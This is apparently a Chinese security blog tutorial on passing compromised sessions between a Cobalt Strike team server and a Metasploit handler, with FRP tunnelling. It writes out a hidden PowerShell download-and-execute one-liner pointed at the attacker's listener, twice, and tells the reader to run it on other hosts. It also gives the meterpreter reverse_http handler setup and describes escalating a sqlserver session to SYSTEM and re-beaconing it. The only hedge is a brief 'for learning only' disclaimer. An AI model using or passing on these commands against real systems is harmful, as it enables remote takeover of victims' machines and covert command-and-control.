cs和msf会话之间的互换

  • A+
所属分类:安全文章

点击蓝字,关注我们

欢迎转发,请勿抄袭!

        Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。

        Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。

cs和msf会话之间的互换

        那么CS的安装分为服务端和客户端,均需要java环境,部署服务端在win的系统管理员权限执行

teamserver.bat ip 密码 //ip是指公网的ip

linux的环境执行

./teamserver ip 密码 //ip是指公网的ip

搭建比较简单,如果出现报错,

Error occurred during initialization of VMCould not reserve enough space for object heap

原因是因为你当前运行内存足,需要在teamserver.bat或者teamserver脚本添加

-Xmx512M -Xms512M -XX:MaxPermSize=256M

以此来确保运行够内存,如果还是报错,就继续修改降低。成功运行(将127.0.0.1改成自己的公网ip)

cs和msf会话之间的互换

        客户端连接运行cobaltstrike.bat或执行

javaw -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

弹出框后,用户任意输入,密码与服务端运行的指令的密码需要一致,主机填写公网的ip。

cs和msf会话之间的互换

默认端口是50050,可以在服务端的运行脚本更改。

cs和msf会话之间的互换

进入客户端以后,页面大概这样子,汉化了部分,还不错。

cs和msf会话之间的互换

进去第一步设置监听,顺序如下:

cs和msf会话之间的互换

5和6需要填写服务端的IP,7需要写一个不常用端口,这里设置2323,避免冲突。那么监听设置好以后,就可以生成payload了。

cs和msf会话之间的互换
cs和msf会话之间的互换

选中刚刚创建的监听,生成一个ps的payload格式为。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx:2323/a'))"

将该脚本运行在其他主机,或者任何主机上。

cs和msf会话之间的互换

可以通过日志,判断是否上线,或下载请求执行,以什么用户执行,那么就是什么用户的权限。接下来将得到的tonken转给msf。一般msf在虚拟机,那么就需要一台公网的服务器,作为穿透工具,推荐使用FRP穿透工具。

win服务器运行

frps.exe -c frps.ini

linux服务器运行

./frps -c frps.ini

kali机器运行客户端的frpc,需要在frpc.ini 配置

cs和msf会话之间的互换

6005为公网的端口,4343为本地端口,7000为默认端口,如果frps.ini端口被修改,那么7000也要修改成一致,默认是7000  。server_addr为服务器地址。当访问公网的ip端口6005就像相当于访问内网的4343

cs和msf会话之间的互换

正常运行,因为4343端口,我没有开始监听,后面红了~~没关系~

msf具体配置

msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_httpmsf5 exploit(multi/handler) > set lhost 127.0.0.1msf5 exploit(multi/handler) > set lport 4343msf5 exploit(multi/handler) > run

在cs将会话转移给msf,在cs增加一个会话,

cs和msf会话之间的互换

得到弹窗,第一需要 add一个监听,

cs和msf会话之间的互换

注意步骤1,2为公网穿透的ip,3为端口。设置完,保存,choose就可以了

cs和msf会话之间的互换

在kali成收到会话,刚才转移的权限为sqlserver权限

cs和msf会话之间的互换

在meterpreter下的权限也相对应。那么接下来就提权,具体提权方法很多,自己摸索

cs和msf会话之间的互换

经过提权,已经将sqlserver提升到system用户的权限,那么接下来,再次将权限转移给CS

方法有两种,第一,再次运行第一次的ps脚本。第二,使用msf转移。演示第一种方法,

cs和msf会话之间的互换

进入cmd命令后,直接执行第一次执行的ps

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx:2323/a'))"

CS这边成功上线

cs和msf会话之间的互换

用户发生变化。。

在实际场景中,需要灵活巧妙使用。需要CS4.0的工具包,在公众号回复‘CS’,即可得到下载链接。

文章声明:该工具、教程仅供学习参考,请勿非法使用。否则与作者无关!

cs和msf会话之间的互换


扫码关注我们

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: